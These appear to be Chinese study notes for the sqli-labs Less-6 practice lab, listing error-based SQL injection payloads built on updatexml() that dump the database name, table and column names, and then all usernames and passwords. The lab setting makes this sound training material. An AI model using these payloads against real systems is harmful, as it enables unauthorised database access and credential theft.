127.0.0.1/sqli/Less-6/?id=1
利用报错信息,
固定格式: Updatexml(a,Xpath,b)
在文档a中,查找 Xpath 格式的内容 替换 b内容
Conact(a,b,c,…) 用来连接括号内的字符串
Id=1’ union select Updatexml(1,concat(0×7e,b)
注入语句:
union select updatexml(1,concat(0x7e,(select database()),0x7e),1)
and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = ‘security’ ),0x7e),1)
and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema = ‘security’ and table_name=‘users’),0x7e),1)
and updatexml(1,concat(0x7e,(select group_concat(username) from users),0x7e),1) %23
and updatexml(1,concat(0x7e,(select group_concat(password) from users),0x7e),1) %23
127.0.0.1/sqli/Less-6/?id=1"
127.0.0.1/sqli/Less-6/?id=-1" union select updatexml(1,concat(0x7e,(select database()),0x7e),1) --+
and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = ‘security’ ),0x7e),1)
爆出数据库下的表名
and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema = ‘security’ and table_name=‘users’),0x7e),1)%23
爆出users表里的字段
and updatexml(1,concat(0x7e,(select group_concat(username) from users),0x7e),1) %23
爆出账户名
and updatexml(1,concat(0x7e,(select group_concat(password) from users),0x7e),1) %23
爆出密码
